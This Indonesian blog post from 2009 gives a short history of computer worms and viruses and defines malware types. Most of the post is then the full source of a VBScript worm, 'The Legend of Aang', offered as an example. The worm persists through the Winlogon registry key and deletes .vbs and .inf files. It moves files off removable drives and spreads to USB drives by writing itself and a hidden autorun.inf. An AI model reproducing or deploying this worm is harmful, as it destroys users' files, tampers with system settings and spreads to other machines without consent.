Rabu, 01 April 2009

All about of virus, worm, and trojan

Gagasan worm dan virus berawal pada tahun 1949, saat seorang founder Electronic Discrete Variable Automatic Computer (EDVAC), John Von Newman, memaparkan dalam sebuah papernya yang berjudul "Theory and Organization of Complicated Automata", dibahas suatu kemungkinan bahwa suatu program dapat melakukan penyebaran dengan sendirinya. Kemudian pada tahun 1960-an, para peneliti AT&T Bell Laboratory membuat semacam permainan dengan menciptakan suatu program yang dapat memusnahkan program ciptaan lawan, dan mampu bertahan terhadap serangan program lawan lainnya. Pada akhirnya si-pemenang adalah pemilik program yang tersisa paling banyak. Para peneliti sadar akan bahaya program tersebut, maka setiap selesai permainan program tersebut selalu dimusnahkan. Cikal bakal program worm pertama kali dibuat oleh Bob Thomas pada tahun 1971. Program ini merupakan solusi dari kebutuhan system kendali lalu lintas udara. Program ini akan membantu mengingatkan operator apabila pengendalian suatu pesawat udara berpindah dari satu komputer ke komputer lainnya. Sesungguhnya program yang disebut "creeper" ini hanya berpindah dari layar ke layar pada jaringan, dengan menampilkan pesan "I’m creeper! Catch me if you can!". Tetapi program creeper tidak mereproduksi dirinya sendiri, hingga beberapa programmer lain

mencoba membuat program serupa, tetapi gagasan tersebut berangsur- angsur hilang dalam beberapa bulan kemudian. Istilah "virus" mungkin sudah tidak asing terdengar, dapat dikatakan hampir setiap orang yang mengenal komputer juga mengenal istilah ini, sementara istilah "worm" tidak begitu dikenal, padahal istilah ini diciptakan oleh John Shoch dan Jon Hupp di Xerox PARC (Palo Alto Research Centre) pada tahun 1979 sebelum istilah virus computer dipublikasikan. Istilah worm ini ternyata diilhami oleh suatu program "tapeworm" (cacing pita) dalam sebuah novel fiksi ilmiah karangan John Brunner yang berjudul "The Shockwave Rider", yang mengisahkan suatu pemerintahan totaliter yang mengendalikan warga negaranya melalui suatu jaringan komputer. Untuk memerangi hal itu akhirnya seorang pahlawan dalam novel tersebut kemudian memenuhi jaringan dengan suatu program yang disebut "tapeworm" sehingga memaksa mematikan jaringan computer yang secara otomatis juga menghilangkan kendali pemerintah terhadap warga negaranya. Kemudian diawal tahun 1980 John Shoch dan Jon Hupp mengadakan sebuah penelitian dengan mengembangkan lima buah program worm, masing-masing worm dibuat dengan tujuan tertentu yang membantu jaringan disekitarnya. Beberapa worm terlihat sederhana, seperti worm "town crier" yang bertugas memasuki jaringan hanya untuk menampilkan pengumuman. Worm lainnya terlihat lebih kompleks dan pintar, seperti worm "vampire". Worm ini tidak akan melakukan kegiatan pada siang harinya, tetapi saat malam hari worm akan melakukan suatu kegiatan tertentu yang telah terprogram sebelumnya, ini berguna untuk memanfaatkan computer yang tidak bekerja pada malam hari dengan memberikan tugas yang kompleks dan memerlukan daya proses yang lebih. Saat fajar, worm akan menghentikan pekerjaannya dengan terlebih dahulu menyimpan seluruh pekerjaan yang dilakukannya malam itu dan menunggu sore berikutnya. Walau bagaimanapun, walaupun program ini berguna tapi disadari bahwa program ini juga akan sangat berbahaya apabila salah digunakan. Hal ini terbukti saat sebuah worm mengalami malfungsi pada suatu malam dan keesokan harinya para pekerja menemukan seluruh komputer yang ada pada jaringan tersebut mengalami crash (suatu kerusakan dimana system output dan input tidak berfungsi). Lebih dari itu saat komputer dihidupkan kembali, worm malfungsi tersebut kembali membuat komputer crash. Pada akhirnya dibuat semacam vaksin untuk mencegah worm tersebut, dan mulai saat itu penelitian terhadap worm tersebut ditutup untuk umum.

Istilah “VIRUS” selalu digunakan sebagai suatu acuan umum untuk setiap malcode (program atau script yang dibuat dengan tujuan membahayakan atau merugikan sebuah system komputer), seperti worm,Trojan bahkan hoax yang sesungguhnya bukan sebuah virus komputer, berikut adalah beberapa jenis malcode tersebut:

->> Computer virus: merujuk pada program yang memiliki kemampuan untuk ber- reproduksi, menulari program lain dan menjadikan file-file program tertular sebagai file infector.

->> Computer worm: merujuk pada program independen yang memiliki kemampuan untuk ber-reproduksi, menulari system komputer dan walaupun mampu untuk menulari program lain namun tidak bertujuan untuk menjadikan file tertular tersebut sebagai suatu file infector.

->> Trojan horse: merujuk pada program independen yang tampaknya berguna, dan ketika dieksekusi, tanpa sepengetahuan pengguna, juga melaksanakan fungsi-fungsi yang bersifat destruktif dan merugikan.

->> Malicious toolkits: merujuk pada program yang didesain untuk membantu menciptakan program-program yang dapat membahayakan sebuah system komputer. Contoh dari program jenis ini adalah tool pembuat virus dan program yang dibuat untuk membantu proses cracking atau hacking.

Dari beberapa keterangan diatas dapat diperjelas bahwa worm adalah suatu algoritma atau program yang mereproduksi diri sendiri dari system ke system dengan menggunakan media penyimpanan atau suatu jaringan। Worm tidak menginfeksi file program lain dengan tujuan menjadikan file terinfeksi tersebut sebagai file infector.

सुम्बेर : http://fitri-ariyanto.blogspot.com/2008/02/apakah-virus-worm-trojan.html

Contoh Sourse Virus

Kali ini saya akan memberikan sedikit contoh dari script virus yang bernama the_legend_of_Aang.vbs

Listing unencrypted



'******************** Now AnG is Encrypted ***************

'**************************************************************

'******************* Call me The legend of Aang ***************



Option Explicit

On Error Resume Next

Dim Fso

Set Fso = CreateObject("Scripting.FileSystemObject")


Dim Shells

Set Shells = CreateObject("Wscript.Shell")


Dim WinDir

Set WinDir = Fso.GetSpecialFolder(0)


Dim SystemDir

Set SystemDir =Fso.GetSpecialFolder(1)


Dim File

Set File = Fso.GetFile(WScript.ScriptFullName)


Dim Drv

Set Drv=File.Drive


Dim InDrive

Set InDrive = Fso.drives


Dim ReadAll,AllFile

Set ReadAll=File.OpenAsTextStream(1,-2)

do while not ReadAll.atendofstream

AllFile = AllFile & ReadAll.readline & vbcrlf

Loop


Dim Count

Count=Drv.DriveType


Dim WriteAll

Do


If Not Fso.FileExists(SystemDir & "\Aang.vbs") then

set WriteAll = Fso.CreateTextFile(SystemDir & "\Aang.vbs",2,true)

WriteAll.Write AllFile

WriteAll.close

set WriteAll = Fso.GetFile(SystemDir & "\Aang.vbs")

WriteAll.Attributes = -1

End If


Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _

SystemDir & "\wscript.exe " & SystemDir & "\Aang.vbs"



Dim Drives

For Each Drives In InDrive


If Drives.DriveType=2 Then

LookVBS "inf",Drives.Path & "\"

LookVBS "INF",Drives.Path & "\"

End if


If Drives.DriveType = 1 Or Drives.DriveType = 2 Then

If Drives.Path<> "A:" Then

Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""

Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"

LookVBS "vbs",WinDir & "\"

LookVBS "vbs",Drives.Path & "\"

If Drives.DriveType = 1 Then

If Drives.Path<>"A:" Then

If Not Fso.FileExists(Drives.Path & "\The_Legend_Of_Aang.vbs") Then

set writeall=fso.CreateFolder (SystemDir & "\RemovableCache")

writeall.close

set writeall=fso.copyfolder (Drives.path & "\*",SystemDir & "\RemovableCache")

writeall.close

set writeall=fso.moveFile (Drives.path & "\*.*",SystemDir & "\RemovableCache")

writeall.close

'set writeall=fso.Deletefolder (Drives.path & "\*",2)

writeall.close

'set writeall=fso.DeleteFile (Drives.path & "\*.*",2)

writeall.close

Set WriteAll=Fso.CreateTextFile(Drives.Path & "\The_Legend_Of_Aang.vbs",2,True)

WriteAll.Write AllFile

WriteAll.Close

Set WriteAll = Fso.GetFile(Drives.Path & "\The_Legend_Of_Aang.vbs")

WriteAll.Attributes = -1

writeall.close

End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then

Dim Chg

Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")

Chg.Attributes = -8

End if

Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)

WriteAll.writeline "[Autorun]" & vbcrlf & "UseAutoplay=1" & vbcrlf & "Icon=%SystemRoot%\system32\SHELL32.dll,7" & vbcrlf & "Shellexecute=wscript.exe The_Legend_Of_Aang.vbs" & vbCrLf & "Shell\OPEN\COMMAND=wscript.exe The_Legend_Of_Aang.vbs"& VbCrlf &"Shell\explore\COMMAND=wscript.exe The_Legend_Of_Aang.vbs" & VbCrLf & "Action=Open folder to view files"

WriteAll.Close

Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")

WriteAll.Attributes = -1

End If

End if

End if

End If


Next


if Count <> 1 then

Wscript.sleep 10000

end if


loop while Count<>1



sub LookVBS(File2Find, SrchPath)

Dim oFileSys, oFolder, oFile,Cut,Delete

Set oFileSys = CreateObject("Scripting.FileSystemObject")

Set oFolder = oFileSys.GetFolder(SrchPath)

For Each oFile In oFolder.Files

Cut=Right(oFile.Name,3)

If UCase(Cut)=UCase(file2find) Then

If oFile.Name <> "The_Legend_Of_Aang.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)

End If

Next

End sub


sumber :mjalah komputer chip